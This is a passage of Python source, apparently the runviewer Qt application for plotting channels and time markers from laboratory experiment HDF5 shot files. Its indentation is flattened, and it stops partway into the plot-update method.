relaunch_display_name = app_descriptions['runviewer']
set_appusermodel(window_id, appids['runviewer'], icon_path, relaunch_command, relaunch_display_name)
SHOT_MODEL__COLOUR_INDEX = 0
SHOT_MODEL__SHUTTER_INDEX = 1
SHOT_MODEL__CHECKBOX_INDEX = 2
SHOT_MODEL__PATH_INDEX = 1
CHANNEL_MODEL__CHECKBOX_INDEX = 0
CHANNEL_MODEL__CHANNEL_INDEX = 0
def format_time(input_sec):
    # input_sec is the time in seconds
if input_sec >= 1:
return "{:.3g}s".format(input_sec)
elif input_sec >= 1e-3:
return "{:.3g}ms".format(input_sec * 1e3)
elif input_sec >= 1e-6:
return "{:.3g}us".format(input_sec * 1e6)
elif input_sec >= 1e-9:
return "{:.3g}ns".format(input_sec * 1e9)
elif input_sec >= 1e-12:
return "{:.3g}ps".format(input_sec * 1e12)
elif input_sec >= 1e-15:
return "{:.3g}fs".format(input_sec * 1e15)
elif input_sec >= 1e-18:
return "{:.3g}as".format(input_sec * 1e18)
else:
return str(input_sec) + "s"
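# Illustrative outputs of format_time (examples added here, not part of the original file):
#   format_time(1.5)     -> "1.5s"
#   format_time(0.0032)  -> "3.2ms"
#   format_time(2.5e-7)  -> "250ns"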
def int_to_enum(enum_list, value):
"""stupid hack to work around the fact that PySide screws with the type of a variable when it goes into a model. Enums are converted to ints, which then
can't be interpreted by QColor correctly (for example)
unfortunately Qt doesn't provide a python list structure of enums, so you have to build the list yourself.
"""
for item in enum_list:
if item == value:
return item
return value
class ScaleHandler():
def __init__(self, input_times, target_positions, stop_time):
        # input_times is a list (may be unsorted) of times which are mapped linearly onto the
        # corresponding target_positions; times between markers are interpolated.
        # For example, input_times of [1,2,4,6] mapped onto evenly spaced positions [1,2,3,4] gives:
        # get_scaled_time(1) -> 1
        # get_scaled_time(1.5) -> 1.5
        # get_scaled_time(3) -> 2.5
        # get_scaled_time(4) -> 3
        # get_scaled_time(5) -> 3.5 ...
self.org_stop_time = float(stop_time)
if not all((x >= 0) and (x <= self.org_stop_time) for x in input_times):
raise Exception('shot contains at least one marker before t=0 and/or after the stop time. Non-linear time currently does not support this.')
unscaled_times = sorted(input_times)
scaled_times = sorted(target_positions)
# append values for linear scaling before t=0 and after stop time
unscaled_times = [min(unscaled_times)-1e-9] + unscaled_times + [max(unscaled_times) + 1e-9]
scaled_times = [min(scaled_times)-1e-9] + scaled_times + [max(scaled_times) + 1e-9]
self.get_scaled_time = interpolate.interp1d(unscaled_times, scaled_times, assume_sorted=True, bounds_error=False, fill_value='extrapolate')
self.get_unscaled_time = interpolate.interp1d(scaled_times, unscaled_times, assume_sorted=True, bounds_error=False, fill_value='extrapolate')
self.scaled_stop_time = self.get_scaled_time(self.org_stop_time)
class ColourDelegate(QItemDelegate):
def __init__(self, view, *args, **kwargs):
QItemDelegate.__init__(self, *args, **kwargs)
self._view = view
self._colours = [Qt.black, Qt.red, Qt.green, Qt.blue, Qt.cyan, Qt.magenta, Qt.yellow, Qt.gray, Qt.darkRed, Qt.darkGreen, Qt.darkBlue, Qt.darkCyan, Qt.darkMagenta, Qt.darkYellow, Qt.darkGray, Qt.lightGray]
self._current_colour_index = 0
def get_next_colour(self):
colour = self._colours[self._current_colour_index]
self._current_colour_index += 1
if self._current_colour_index >= len(self._colours):
self._current_colour_index = 0
return colour
def createEditor(self, parent, option, index):
editor = QComboBox(parent)
#colours = QColor.colorNames()
for colour in self._colours:
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
editor.addItem(QIcon(pixmap), '', colour)
editor.activated.connect(lambda index, editor=editor: self._view.commitData(editor))
editor.activated.connect(lambda index, editor=editor: self._view.closeEditor(editor, QAbstractItemDelegate.NoHint))
QTimer.singleShot(10, editor.showPopup)
return editor
def setEditorData(self, editor, index):
value = index.model().data(index, Qt.UserRole)
for i in range(editor.count()):
if editor.itemData(i) == value():
editor.setCurrentIndex(i)
break
def setModelData(self, editor, model, index):
icon = editor.itemIcon(editor.currentIndex())
colour = editor.itemData(editor.currentIndex())
# Note, all data being written to the model must be read out of the editor PRIOR to calling model.setData()
# This is because a call to model.setData() triggers setEditorData(), which messes up subsequent
# calls to the editor to determine the currently selected item/data
model.setData(index, icon, Qt.DecorationRole)
model.setData(index, lambda clist=self._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
def updateEditorGeometry(self, editor, option, index):
editor.setGeometry(option.rect)
class RunviewerMainWindow(QMainWindow):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def event(self, event):
result = QMainWindow.event(self, event)
if event.type() == QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunViewer(object):
def __init__(self, exp_config):
self.ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'main.ui'), RunviewerMainWindow())
# setup shot treeview model
self.shot_model = QStandardItemModel()
self.shot_model.setHorizontalHeaderLabels(['colour', 'shutters', 'path'])
self.ui.shot_treeview.setModel(self.shot_model)
self.ui.shot_treeview.resizeColumnToContents(1)
self.shot_model.itemChanged.connect(self.on_shot_selection_changed)
self.shot_colour_delegate = ColourDelegate(self.ui.shot_treeview)
self.ui.shot_treeview.setItemDelegateForColumn(0, self.shot_colour_delegate)
# setup channel treeview model
self.channel_model = QStandardItemModel()
self.channel_model.setHorizontalHeaderLabels(['channel'])
self.ui.channel_treeview.setModel(self.channel_model)
self.channel_model.itemChanged.connect(self.update_plots)
# create a hidden plot widget that all plots can link their x-axis too
hidden_plot = pg.PlotWidget(name='runviewer - time axis link')
hidden_plot.setMinimumHeight(1)
hidden_plot.setMaximumHeight(1)
hidden_plot.setLabel('bottom', 'Time', units='s')
hidden_plot.setLabel('left', " ")
hidden_plot.showAxis('right', True)
hidden_plot_item = hidden_plot.plot([0, 1], [0, 0])
self._hidden_plot = (hidden_plot, hidden_plot_item)
self.ui.hidden_plot_layout.addWidget(hidden_plot)
time_axis_plot = pg.PlotWidget()
time_axis_plot.setMinimumHeight(120)
time_axis_plot.setMaximumHeight(120)
time_axis_plot.setLabel('bottom', 'Time', units='s')
time_axis_plot.showAxis('right', True)
time_axis_plot.setXLink('runviewer - time axis link')
time_axis_plot.setMouseEnabled(y=False)
time_axis_plot.getAxis('left').setTicks([]) # hide y ticks in the left & right side. only show time axis
time_axis_plot.getAxis('right').setTicks([])
time_axis_plot.setLabel('left', 'Slots')
time_axis_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, time_axis_plot, "Slots"))
time_axis_plot_item = time_axis_plot.plot([0, 1], [0, 0], pen=(255, 255, 255))
self._time_axis_plot = (time_axis_plot, time_axis_plot_item)
self.all_markers = {}
self.all_marker_items = {}
self.movable_marker_items = {}
markers_plot = pg.PlotWidget(name='runviewer - markers')
markers_plot.setMinimumHeight(120)
markers_plot.setMaximumHeight(120)
markers_plot.showAxis('top', False)
markers_plot.showAxis('bottom', False)
markers_plot.showAxis('left', True)
markers_plot.showAxis('right', True)
markers_plot.getAxis('left').setTicks([])
markers_plot.getAxis('right').setTicks([])
markers_plot.setLabel('left', 'Markers')
markers_plot.setXLink('runviewer - time axis link')
markers_plot.setMouseEnabled(y=False)
markers_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, markers_plot, "Markers"))
markers_plot_item = markers_plot.plot([])
self._markers_plot = (markers_plot, markers_plot_item)
self.ui.verticalLayout_9.insertWidget(1,markers_plot)
self.ui.plot_layout.addWidget(time_axis_plot)
# add some icons
self.ui.add_shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.remove_shots.setIcon(QIcon(':/qtutils/fugue/minus'))
self.ui.enable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box'))
self.ui.disable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box-uncheck'))
self.ui.group_channel.setIcon(QIcon(':/qtutils/fugue/layers-group'))
self.ui.delete_group.setIcon(QIcon(':/qtutils/fugue/layers-ungroup'))
self.ui.channel_move_to_top.setIcon(QIcon(':/qtutils/fugue/arrow-stop-090'))
self.ui.channel_move_up.setIcon(QIcon(':/qtutils/fugue/arrow-090'))
self.ui.channel_move_down.setIcon(QIcon(':/qtutils/fugue/arrow-270'))
self.ui.channel_move_to_bottom.setIcon(QIcon(':/qtutils/fugue/arrow-stop-270'))
self.ui.reset_x_axis.setIcon(QIcon(':/qtutils/fugue/layer-resize-replicate'))
self.ui.reset_y_axis.setIcon(QIcon(':/qtutils/fugue/layer-resize-replicate-vertical'))
self.ui.toggle_tooltip.setIcon(QIcon(':/qtutils/fugue/ui-tooltip-balloon'))
self.ui.linear_time.setIcon(QIcon(':/qtutils/fugue/clock-history'))
self.ui.equal_space_time.setIcon(QIcon(':/qtutils/fugue/border-vertical-all'))
self.ui.linear_time.setEnabled(False)
self.ui.equal_space_time.setEnabled(False)
self.ui.actionOpen_Shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.actionQuit.setIcon(QIcon(':/qtutils/fugue/cross-button'))
self.ui.actionLoad_channel_config.setIcon(QIcon(':/qtutils/fugue/folder-open'))
self.ui.actionSave_channel_config.setIcon(QIcon(':/qtutils/fugue/disk'))
# disable buttons that are not yet implemented to help avoid confusion!
self.ui.group_channel.setEnabled(False)
self.ui.delete_group.setEnabled(False)
# connect signals
self.ui.reset_x_axis.clicked.connect(self.on_x_axis_reset)
self.ui.reset_y_axis.clicked.connect(self.on_y_axes_reset)
self.ui.channel_move_up.clicked.connect(self._move_up)
self.ui.channel_move_down.clicked.connect(self._move_down)
self.ui.channel_move_to_top.clicked.connect(self._move_top)
self.ui.channel_move_to_bottom.clicked.connect(self._move_bottom)
self.ui.enable_selected_shots.clicked.connect(self._enable_selected_shots)
self.ui.disable_selected_shots.clicked.connect(self._disable_selected_shots)
self.ui.add_shot.clicked.connect(self.on_add_shot)
self.ui.markers_comboBox.currentIndexChanged.connect(self._update_markers)
# self.ui.non_linear_time.toggled.connect(self._toggle_non_linear_time)
self.ui.linear_time.clicked.connect(self._reset_linear_time)
self.ui.equal_space_time.clicked.connect(self._space_markers_evenly)
self.ui.remove_shots.clicked.connect(self.on_remove_shots)
self.ui.actionOpen_Shot.triggered.connect(self.on_add_shot)
self.ui.actionQuit.triggered.connect(self.ui.close)
self.ui.actionLoad_channel_config.triggered.connect(self.on_load_channel_config)
self.ui.actionSave_channel_config.triggered.connect(self.on_save_channel_config)
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.show()
# internal variables
#self._channels_list = {}
self.plot_widgets = {}
self.plot_items = {}
self.shutter_lines = {}
try:
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
except LabConfig.NoOptionError:
exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
if not os.path.exists(self.default_config_path):
os.makedirs(self.default_config_path)
self.last_opened_shots_folder = exp_config.get('paths', 'experiment_shot_storage')
# start resample thread
self._resample = False
self._thread = threading.Thread(target=self._resample_thread)
self._thread.daemon = True
self._thread.start()
# start shots_to_process_queue monitoring thread
self._shots_to_process_thread = threading.Thread(target=self._process_shots)
self._shots_to_process_thread.daemon = True
self._shots_to_process_thread.start()
self.scale_time = False
self.scalehandler = None
def _update_markers(self, index):
for line, plot in self.all_marker_items.items():
# line.blockSignals(True)
plot.removeItem(line)
self.all_marker_items = {}
for line, plot in self.movable_marker_items.items():
# line.blockSignals(True)
plot.removeItem(line)
self.movable_marker_items = {}
self.marker_times_unscaled = {}
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
if index == 0:
self.ui.linear_time.setEnabled(False)
self.ui.equal_space_time.setEnabled(False)
self.all_markers = {}
else:
self.ui.linear_time.setEnabled(True)
self.ui.equal_space_time.setEnabled(True)
self.all_markers = shot.markers
# self._update_non_linear_time(changed_shot=True)
times = sorted(list(self.all_markers.keys()))
last_time = 0
for i, (t, m) in enumerate(sorted(self.all_markers.items())):
if i < len(times)-1:
delta_t = times[i+1] - t
# Now always have a marker at stop time
# else:
# delta_t = shot.stop_time - t
unscaled_t = t
if self.scale_time:
t = self.scalehandler.get_scaled_time(t)
color = m['color']
color = QColor(color[0], color[1], color[2])
label = m['label'].decode() if isinstance( m['label'], bytes) else str(m['label'])
if i == 0:
line = self._markers_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=label, labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]}, movable=False )
else:
line = self._markers_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=label, labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]}, movable=True )
line.setBounds([last_time+1e-9 if last_time !=0 else last_time ,None])
line.sigPositionChanged.connect(self._marker_moving)
line.sigPositionChangeFinished.connect(self._marker_moved)
# self.all_marker_items[line] = self._markers_plot[0]
self.movable_marker_items[line] = self._markers_plot[0]
self.marker_times_unscaled[line] = unscaled_t
line = self._time_axis_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=format_time(delta_t), labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]}, movable=False )
self.all_marker_items[line] = self._time_axis_plot[0]
last_time = t
self.update_plots()
def mouseMovedEvent(self, position, ui, name):
if self.ui.toggle_tooltip.isChecked():
v = ui.scene().views()[0]
viewP = v.mapFromScene(position)
glob_pos = ui.mapToGlobal(viewP) # convert to Screen x
glob_zero = ui.mapToGlobal(QPoint(0, 0))
self._global_start_x = glob_zero.x()
self._global_start_y = glob_zero.y()
self._global_width = ui.width()
self._global_height = ui.height()
coord_pos = ui.plotItem.vb.mapSceneToView(position)
if len(self.get_selected_shots_and_colours()) > 0:
scaled_t = float(coord_pos.x())
if self.scale_time and self.scalehandler is not None:
unscaled_t = float(self.scalehandler.get_unscaled_time(scaled_t))
else:
unscaled_t = scaled_t
if unscaled_t is not None:
pos = QPoint(glob_pos.x(), glob_pos.y())
plot_data = ui.plotItem.listDataItems()[0].getData()
if plot_data[0] is not None and scaled_t is not None:
nearest_index = numpy.abs(plot_data[0] - scaled_t).argmin() - 1
y_val = "{:.2f}".format(plot_data[1][nearest_index])
else:
y_val = '-'
text = "Plot: {} \nTime: {:.9f}s\nValue: {}".format(name, unscaled_t, y_val)
QToolTip.showText(pos, text)
def _reset_linear_time(self):
self.scale_time = False
markers_unscaled = sorted(list(self.all_markers.keys()))
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
scalehandler = ScaleHandler(markers_unscaled, markers_unscaled, shot.stop_time)
self._update_non_linear_time(new_scalehandler=scalehandler)
self.on_x_axis_reset()
self._resample = True
def _space_markers_evenly(self):
self.scale_time = True
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
markers_unscaled = sorted(list(self.all_markers.keys()))
target_length = shot.stop_time / float(len(markers_unscaled) - 1)
scaled_times = [target_length * i for i in range(len(markers_unscaled))]
scalehandler = ScaleHandler(markers_unscaled, scaled_times, shot.stop_time)
self._update_non_linear_time(new_scalehandler=scalehandler)
self.on_x_axis_reset()
self._resample = True
def _marker_moving(self, line):
self.scale_time = True
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
markers_unscaled = sorted(list(self.all_markers.keys()))
# What was the unscaled time of the marker that moved, and where is it now?
moved_marker_unscaled_t = self.marker_times_unscaled[line]
moved_marker_new_pos = line.pos().x()
# Where was the marker just before it was moved? This is given by the current scalehandler
if self.scalehandler is not None:
moved_marker_last_pos = self.scalehandler.get_scaled_time(moved_marker_unscaled_t)
else:
moved_marker_last_pos = moved_marker_unscaled_t
# How far has the marker moved?
delta_marker = moved_marker_new_pos - moved_marker_last_pos
# Now we want to shift the other markers if they are at a higher position than this one
markers = list(self.marker_times_unscaled.keys())
new_scaled_times = []
for marker in markers:
if marker == line:
new_scaled_times.append(moved_marker_new_pos)
else:
x = marker.pos().x()
if x > moved_marker_last_pos:
x += delta_marker
new_scaled_times.append(x)
new_scaled_times = sorted(new_scaled_times)
scalehandler = ScaleHandler(markers_unscaled,new_scaled_times, shot.stop_time)
self._update_non_linear_time(new_scalehandler=scalehandler)
def _marker_moved(self, line):
self._resample = True
def _update_non_linear_time(self, changed_shot=False, new_scalehandler=None):
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
if new_scalehandler is None:
# make a 1:1 scalehandler using the hidden_plot
self.scale_time = False
end_t = self._hidden_plot[1].getData()[0][-1]
new_scalehandler = ScaleHandler([0,end_t],[0,end_t],end_t)
old_scalehandler = self.scalehandler
self.scalehandler = new_scalehandler
# combine markers and shutter lines
markers = list(self.all_marker_items.keys())
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
markers.append(line)
for line in self.shutter_lines[channel][shot][1]:
markers.append(line)
# Move all markers/shutter lines to their new positions
for marker in markers:
pos = marker.pos()
if old_scalehandler is None:
unscaled_x = pos.x()
else:
unscaled_x = old_scalehandler.get_unscaled_time(pos.x())
if self.scale_time and self.scalehandler is not None:
new_x = self.scalehandler.get_scaled_time(unscaled_x)
else:
new_x = unscaled_x
pos.setX(new_x)
marker.setPos(pos)
# Move the movable lines in the upper graph
mv_markers = list(self.movable_marker_items.keys())
new_marker_times = {}
for marker in mv_markers:
if self.scale_time and self.scalehandler is not None:
new_x = self.scalehandler.get_scaled_time(self.marker_times_unscaled[marker])
else:
new_x = self.marker_times_unscaled[marker]
new_marker_times[float(new_x)] = marker
last_time = None
for t in sorted(list(new_marker_times.keys())):
marker = new_marker_times[t]
marker.blockSignals(True)
marker.setBounds([None, None])
marker.setPos(t)
marker.setBounds([last_time+1e-9 if last_time is not None else 0.0, None])
marker.blockSignals(False)
last_time = t
if shot is not None and self.scale_time:
self._time_axis_plot[0].getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
else:
self._time_axis_plot[0].getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
for item in plot.getPlotItem().items:
if isinstance(item, pg.PlotDataItem):
if old_scalehandler is not None:
unscaled_t = old_scalehandler.get_unscaled_time(item.xData)
else:
unscaled_t = item.xData
if self.scalehandler is not None:
item.setData(self.scalehandler.get_scaled_time(unscaled_t), item.yData)
else:
item.setData(unscaled_t, item.yData)
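# Illustrative note (not part of the original code): ScaleHandler is used here as a
# mapping between "unscaled" shot times and "scaled" display times. It is constructed
# as ScaleHandler(unscaled_times, scaled_times, stop_time) and queried with
# get_scaled_time()/get_unscaled_time() on scalars or arrays. A minimal sketch of the
# expected behaviour at the anchor points (interpolation between them is assumed):
#   sh = ScaleHandler([0.0, 1.0, 5.0], [0.0, 2.5, 5.0], 5.0)
#   sh.get_scaled_time(1.0)    # -> 2.5
#   sh.get_unscaled_time(2.5)  # -> 1.0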
def _process_shots(self):
while True:
filepath = shots_to_process_queue.get()
inmain_later(self.load_shot, filepath)
def on_load_channel_config(self):
config_file = QFileDialog.getOpenFileName(self.ui, "Select file to load", self.default_config_path, "Config files (*.ini)")
if isinstance(config_file, tuple):
config_file, _ = config_file
if config_file:
runviewer_config = LabConfig(config_file)
try:
channels = ast.literal_eval(runviewer_config.get('runviewer_state', 'Channels'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
channels = {}
for row, (channel, checked) in enumerate(channels):
check_items = self.channel_model.findItems(channel)
if len(check_items) == 0:
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
items.append(check_item)
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
check_item.setEnabled(False)
self.channel_model.insertRow(row, items)
else:
check_item = check_items[0]
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
self.channel_model.takeRow(check_item.row())
self.channel_model.insertRow(row, check_item)
def on_save_channel_config(self):
save_file = QFileDialog.getSaveFileName(self.ui, 'Select file to save current channel configuration', self.default_config_path, "config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if save_file:
runviewer_config = LabConfig(save_file)
channels = []
for row in range(self.channel_model.rowCount()):
item = self.channel_model.item(row)
channels.append((item.text(), item.checkState() == Qt.Checked))
runviewer_config.set('runviewer_state', 'Channels', pprint.pformat(channels))
def on_toggle_shutter(self, checked, current_shot):
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
if shot == current_shot:
for line in self.shutter_lines[channel][shot][0]:
if checked:
line.show()
else:
line.hide()
for line in self.shutter_lines[channel][shot][1]:
if checked:
line.show()
else:
line.hide()
def on_add_shot(self):
selected_files = QFileDialog.getOpenFileNames(self.ui, "Select file to load", self.last_opened_shots_folder, "HDF5 files (*.h5 *.hdf5)")
popup_warning = False
if isinstance(selected_files, tuple):
selected_files, _ = selected_files
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
selected_files = [os.path.abspath(str(shot_file)) for shot_file in selected_files]
if len(selected_files) > 0:
self.last_opened_shots_folder = os.path.dirname(selected_files[0])
for file in selected_files:
try:
filepath = str(file)
# Qt has this weird behaviour where if you type in the name of a file that exists
# but does not have the extension you have limited the dialog to, the OK button is greyed out
# but you can hit enter and the file will be selected.
# So we must check the extension of each file here!
if filepath.endswith('.h5') or filepath.endswith('.hdf5'):
self.load_shot(filepath)
else:
popup_warning = True
except:
popup_warning = True
raise
if popup_warning:
message = QMessageBox()
message.setText("Warning: Some shots were not loaded because they were not valid hdf5 files")
message.setIcon(QMessageBox.Warning)
message.setWindowTitle("Runviewer")
message.setStandardButtons(QMessageBox.Ok)
message.exec_()
def on_remove_shots(self):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in selection_model.selectedRows()]
# sort in descending order to prevent index changes of rows to be deleted
selected_row_list.sort(reverse=True)
reply = QMessageBox.question(self.ui, 'Runviewer', 'Remove {} shots?'.format(len(selected_row_list)),
QMessageBox.Yes | QMessageBox.No)
if reply == QMessageBox.No:
return
for row in selected_row_list:
item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
shot = item.data()
# unselect shot
item.setCheckState(Qt.Unchecked)
shutter_item.setCheckState(Qt.Unchecked)
# remove row
self.shot_model.removeRow(row)
del shot
def on_shot_selection_changed(self, item):
if self.shot_model.indexFromItem(item).column() == SHOT_MODEL__CHECKBOX_INDEX:
# add or remove a colour for this shot
checked = item.checkState()
row = self.shot_model.indexFromItem(item).row()
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
check_shutter = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
if checked:
colour = colour_item.data(Qt.UserRole)
if colour is not None:
colour = colour()
else:
colour = self.shot_colour_delegate.get_next_colour()
colour_item.setEditable(True)
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
icon = QIcon(pixmap)
colour_item.setData(lambda clist=self.shot_colour_delegate._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
colour_item.setData(icon, Qt.DecorationRole)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(True)
if self.ui.markers_comboBox.currentIndex() == 0:
self.ui.markers_comboBox.setCurrentIndex(shot_combobox_index)
if item.data().shutter_times != {}:
check_shutter.setEnabled(True)
else:
check_shutter.setEnabled(False)
check_shutter.setToolTip("This shot doesn't contain shutter markers")
else:
# colour = None
# icon = None
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
if shot_combobox_index == self.ui.markers_comboBox.currentIndex():
self.ui.markers_comboBox.setCurrentIndex(0)
colour_item.setEditable(False)
check_shutter.setEnabled(False)
# model.setData(index, editor.itemIcon(editor.currentIndex()),
# model.setData(index, editor.itemData(editor.currentIndex()), Qt.UserRole)
self.update_channels_treeview()
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__COLOUR_INDEX:
# update the plot colours
# get reference to the changed shot
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
# find and update the pen of the plot items
for channel in self.plot_items.keys():
for shot in self.plot_items[channel]:
if shot == current_shot:
colour = item.data(Qt.UserRole)
self.plot_items[channel][shot].setPen(pg.mkPen(QColor(colour()), width=2))
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__SHUTTER_INDEX:
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
self.on_toggle_shutter(item.checkState(), current_shot)
def load_shot(self, filepath):
shot = Shot(filepath)
# add shot to shot list
# Create Items
items = []
colour_item = QStandardItem('')
colour_item.setEditable(False)
colour_item.setToolTip('Double-click to change colour')
items.append(colour_item)
check_shutter = QStandardItem()
check_shutter.setCheckable(True)
check_shutter.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_shutter.setEnabled(False)
check_shutter.setToolTip("Toggle shutter markers")
items.append(check_shutter)
check_item = QStandardItem(shot.path)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_item.setData(shot)
check_item.setToolTip(filepath)
items.append(check_item)
# script name
# path_item = QStandardItem(shot.path)
# path_item.setEditable(False)
# items.append(path_item)
self.shot_model.appendRow(items)
self.ui.markers_comboBox.addItem(os.path.basename(shot.path), shot)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(shot.path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
# only do this if we are checking the shot we are adding
# self.update_channels_treeview()
def get_selected_shots_and_colours(self):
# get the ticked shots
ticked_shots = {}
for i in range(self.shot_model.rowCount()):
item = self.shot_model.item(i, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(i, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(i, SHOT_MODEL__SHUTTER_INDEX)
if item.checkState() == Qt.Checked:
shot = item.data()
colour_item_data = colour_item.data(Qt.UserRole)
ticked_shots[shot] = (colour_item_data(), shutter_item.checkState())
return ticked_shots
def update_channels_treeview(self):
ticked_shots = self.get_selected_shots_and_colours()
# get set of channels
channels = {}
for shot in ticked_shots.keys():
channels[shot] = set(shot.channels)
channels_set = frozenset().union(*channels.values())
# now find channels in channels_set which are not in the treeview, and add them
# now find channels in channels set which are already in the treeview, but deactivated, and activate them
treeview_channels_dict = {}
deactivated_treeview_channels_dict = {}
for i in range(self.channel_model.rowCount()):
item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
# Sanity check
if str(item.text()) in treeview_channels_dict:
raise RuntimeError("A duplicate channel name was detected in the treeview due to an internal error. Please lodge a bug report detailing how channels with the same name appeared in the channel treeview, then restart the application")
treeview_channels_dict[str(item.text())] = i
if not item.isEnabled():
deactivated_treeview_channels_dict[str(item.text())] = i
treeview_channels = set(treeview_channels_dict.keys())
deactivated_treeview_channels = set(deactivated_treeview_channels_dict.keys())
# speed up working with self.channel_model by blocking signals and re-enabling them later
self.channel_model.blockSignals(True)
# find list of channels to work with
channels_to_add = channels_set.difference(treeview_channels)
for channel in sorted(channels_to_add):
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked)
items.append(check_item)
# channel_name_item = QStandardItem(channel)
# channel_name_item.setEditable(False)
# items.append(channel_name_item)
self.channel_model.appendRow(items)
channels_to_reactivate = deactivated_treeview_channels.intersection(channels_set)
for channel in channels_to_reactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(deactivated_treeview_channels_dict[channel], i)
item.setEnabled(True)
item.setSelectable(True)
# now find channels in the treeview which are not in the channels_set and deactivate them
channels_to_deactivate = treeview_channels.difference(channels_set)
for channel in channels_to_deactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(treeview_channels_dict[channel], i)
item.setEnabled(False)
item.setSelectable(False)
self.channel_model.blockSignals(False)
self.channel_model.layoutChanged.emit()
# TODO: Also update entries in groups
self.update_plots()
def update_plots(self):
# get list of selected shots
ticked_shots = self.get_selected_shots_and_colours()
# Should we rescale the x-axis?
# if self._hidden_plot[0].getViewBox.getState()['autoRange'][0]:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
# else:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis, enable=False)
# find stop time of longest ticked shot
largest_stop_time = 0
stop_time_set = False
for shot in ticked_shots.keys():
if self.scale_time:
st = self.scalehandler.get_scaled_time(shot.stop_time)
else:
st = shot.stop_time
if st > largest_stop_time:
largest_stop_time = st
stop_time_set = True
if not stop_time_set:
largest_stop_time = 1.0
# Update the range of the link plot
self._hidden_plot[1].setData([0, largest_stop_time], [0, 1e-9])
# Update plots
for i in range(self.channel_model.rowCount()):
